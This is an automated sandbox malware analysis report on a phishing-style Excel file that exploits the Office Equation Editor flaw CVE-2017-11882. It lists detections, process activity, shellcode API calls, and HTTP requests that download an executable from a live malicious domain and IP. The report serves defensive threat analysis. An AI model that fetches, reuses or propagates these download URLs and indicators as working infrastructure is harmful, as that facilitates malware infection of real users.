Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-008847332.xlam.xlsx

Overview

General Information

Sample name:PO-008847332.xlam.xlsx
Analysis ID:1540837
MD5:1ceb0704ce7180d31e51d1b19577f8fd
SHA1:2b36a1718e467f7c651b0f6988c2c00bb2cf510d
SHA256:87c11e91ae0ec1d31aba83c2e3f3a70a8bccfc731be2be1fe4aaa91681825acd
Tags:xlamxlsxuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Creates HTML files with .exe extension (expired dropper behavior)
Document exploit detected (process start blacklist hit)
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Shellcode detected
Sigma detected: Equation Editor Network Connection
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Document misses a certain OLE stream usually present in this Microsoft Office document type
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3380 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 3576 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0xd94aa:$s1: <legacyDrawing r:id="
  • 0xd94d2:$s2: <oleObject progId="
  • 0xd9521:$s3: autoLoad="true"

Exploits

barindex
Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 104.21.53.112, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3576, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3576, TargetFilename: C:\Users\user\AppData\Local\Temp\xyjhromj.exe

System Summary

barindex
Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3576, Protocol: tcp, SourceIp: 104.21.53.112, SourceIsIpv6: false, SourcePort: 80
Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3576, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-24T08:49:36.098228+020020225501A Network Trojan was detected192.168.2.2249161104.21.53.11280TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: PO-008847332.xlam.xlsxAvira: detected
Source: PO-008847332.xlam.xlsxReversingLabs: Detection: 65%

Exploits

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 104.21.53.112 Port: 80Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035706E9 WinExec,ExitProcess,2_2_035706E9
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0357069E URLDownloadToFileW,2_2_0357069E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03570605 LoadLibraryW,URLDownloadToFileW,2_2_03570605
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0357055A ExitProcess,2_2_0357055A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03570573 URLDownloadToFileW,2_2_03570573
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0357061F URLDownloadToFileW,2_2_0357061F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0357058F URLDownloadToFileW,2_2_0357058F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03570709 ExitProcess,2_2_03570709
Source: global trafficDNS query: name: eficienciaeningenieria.com.mx
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.53.112:80
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.53.112:80
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.53.112:80
Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.53.112:80
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.53.112:80
Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.53.112:80
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.53.112:80
Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.53.112:80
Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.53.112:80
Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.53.112:80
Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.53.112:80
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.53.112:80
Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.53.112:80
Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.53.112:80
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.53.112:80

Networking

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: xyjhromj.exe.2.dr
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Network trafficSuricata IDS: 2022550 - Severity 1 - ET MALWARE Possible Malicious Macro DL EXE Feb 2016 : 192.168.2.22:49161 -> 104.21.53.112:80
Source: global trafficHTTP traffic detected: GET /kdeplu/ngoct2.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: eficienciaeningenieria.com.mxConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: eficienciaeningenieria.com.mxConnection: Keep-Alive
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0357069E URLDownloadToFileW,2_2_0357069E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\suspendedpage[1].htmJump to behavior
Source: global trafficHTTP traffic detected: GET /kdeplu/ngoct2.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: eficienciaeningenieria.com.mxConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: eficienciaeningenieria.com.mxConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: eficienciaeningenieria.com.mx
Source: EQNEDT32.EXE, 00000002.00000002.467960216.0000000000677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eficienciaeningenieria.com.mx/cgi-sys/suspendedpage.cgiB
Source: EQNEDT32.EXE, 00000002.00000002.467960216.0000000000677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eficienciaeningenieria.com.mx/cgi-sys/suspendedpage.cgis
Source: EQNEDT32.EXE, 00000002.00000002.467960216.000000000063E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eficienciaeningenieria.com.mx/kdeplu/ngoct2.exe
Source: EQNEDT32.EXE, 00000002.00000002.468085162.0000000003570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eficienciaeningenieria.com.mx/kdeplu/ngoct2.exej

System Summary

barindex
Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: PO-008847332.xlam.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: sheet1.xml, type: SAMPLEMatched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
Source: classification engineClassification label: mal100.expl.winXLSX@3/4@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$PO-008847332.xlam.xlsxJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8A35.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: PO-008847332.xlam.xlsxReversingLabs: Detection: 65%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntvdm64.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: PO-008847332.xlam.xlsxInitial sample: OLE indicators vbamacros = False
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0357004E push dx; retf 2_2_03570054
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03570439 push cs; ret 2_2_0357043A
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3596Thread sleep time: -240000s >= -30000sJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-328
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03570710 mov edx, dword ptr fs:[00000030h]2_2_03570710
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts33
Exploitation for Client Execution
1
Scripting
1
Process Injection
1
Masquerading
OS Credential Dumping1
Virtualization/Sandbox Evasion
Remote ServicesData from Local System2
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable Media12
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager3
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Remote System Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
PO-008847332.xlam.xlsx66%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
PO-008847332.xlam.xlsx100%AviraEXP/CVE-2017-11882.Gen
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
eficienciaeningenieria.com.mx
104.21.53.112
truetrue
    unknown
    NameMaliciousAntivirus DetectionReputation
    http://eficienciaeningenieria.com.mx/kdeplu/ngoct2.exetrue
      unknown
      http://eficienciaeningenieria.com.mx/cgi-sys/suspendedpage.cgitrue
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://eficienciaeningenieria.com.mx/kdeplu/ngoct2.exejEQNEDT32.EXE, 00000002.00000002.468085162.0000000003570000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          http://eficienciaeningenieria.com.mx/cgi-sys/suspendedpage.cgiBEQNEDT32.EXE, 00000002.00000002.467960216.0000000000677000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            http://eficienciaeningenieria.com.mx/cgi-sys/suspendedpage.cgisEQNEDT32.EXE, 00000002.00000002.467960216.0000000000677000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              104.21.53.112
              eficienciaeningenieria.com.mxUnited States
              13335CLOUDFLARENETUStrue
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1540837
              Start date and time:2024-10-24 08:47:49 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 4m 10s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
              Number of analysed new started processes analysed:7
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:PO-008847332.xlam.xlsx
              Detection:MAL
              Classification:mal100.expl.winXLSX@3/4@1/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 8
              • Number of non-executed functions: 1
              Cookbook Comments:
              • Found application associated with file extension: .xlsx
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Attach to Office via COM
              • Active ActiveX Object
              • Scroll down
              • Close Viewer
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: PO-008847332.xlam.xlsx
              TimeTypeDescription
              02:49:33API Interceptor53x Sleep call for process: EQNEDT32.EXE modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              104.21.53.112Inquiry N TM24-10-09.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
              • eficienciaeningenieria.com.mx/vnkl/ng5th.exe
              New Order #QAY3763.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
              • eficienciaeningenieria.com.mx/ngqwpl/ngown.exe
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              eficienciaeningenieria.com.mxInquiry N TM24-10-09.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
              • 104.21.53.112
              New Order #QAY3763.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
              • 104.21.53.112
              PaymentIBAN Confirmation.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
              • 172.67.212.58
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              CLOUDFLARENETUSRFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
              • 188.114.97.3
              g4Cyr2T5jq.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
              • 104.21.53.8
              Urgent Quotation documents One Pdf.vbsGet hashmaliciousAgentTeslaBrowse
              • 104.26.12.205
              #PO247762.docxGet hashmaliciousRemcosBrowse
              • 188.114.96.3
              file.exeGet hashmaliciousLummaC, StealcBrowse
              • 172.67.206.204
              Inova oferta nr F01281624PL.htmlGet hashmaliciousUnknownBrowse
              • 1.1.1.1
              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
              • 172.67.206.204
              VY871GcABT.exeGet hashmaliciousDCRatBrowse
              • 188.114.96.3
              01YP9Lwum8.exeGet hashmaliciousDCRatBrowse
              • 188.114.97.3
              WBPWLAj09q.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
              • 188.114.96.3
              No context
              No context
              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
              File Type:HTML document, ASCII text, with very long lines (4070)
              Category:dropped
              Size (bytes):7822
              Entropy (8bit):5.649370240383979
              Encrypted:false
              SSDEEP:192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJqYo4i:QJvVGaRF8I8y2i
              MD5:56FDE4766BA19EAD0C4C4AB9D52B0344
              SHA1:B713C2A83B95D965A33EC03C68D41CC3B4894D81
              SHA-256:9E2627AB3E991A619F32F9D3AABA4DC75AA0BE27339AB09DABB3D29E88B82CBE
              SHA-512:3A0353A717810A8FF88AAA57E452934E24ED3B109D8BA30643B467186AF0F19BF08F141B8DFF29264C651E75C2FC8CE357EAB4532400B0177943769165558C45
              Malicious:false
              Reputation:low
              Preview:<!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.
              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
              File Type:HTML document, ASCII text, with very long lines (4070)
              Category:dropped
              Size (bytes):7822
              Entropy (8bit):5.649370240383979
              Encrypted:false
              SSDEEP:192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJqYo4i:QJvVGaRF8I8y2i
              MD5:56FDE4766BA19EAD0C4C4AB9D52B0344
              SHA1:B713C2A83B95D965A33EC03C68D41CC3B4894D81
              SHA-256:9E2627AB3E991A619F32F9D3AABA4DC75AA0BE27339AB09DABB3D29E88B82CBE
              SHA-512:3A0353A717810A8FF88AAA57E452934E24ED3B109D8BA30643B467186AF0F19BF08F141B8DFF29264C651E75C2FC8CE357EAB4532400B0177943769165558C45
              Malicious:true
              Reputation:low
              Preview:<!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):165
              Entropy (8bit):1.4377382811115937
              Encrypted:false
              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
              MD5:797869BB881CFBCDAC2064F92B26E46F
              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
              Malicious:false
              Reputation:high, very likely benign file
              Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):165
              Entropy (8bit):1.4377382811115937
              Encrypted:false
              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
              MD5:797869BB881CFBCDAC2064F92B26E46F
              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
              Malicious:true
              Reputation:high, very likely benign file
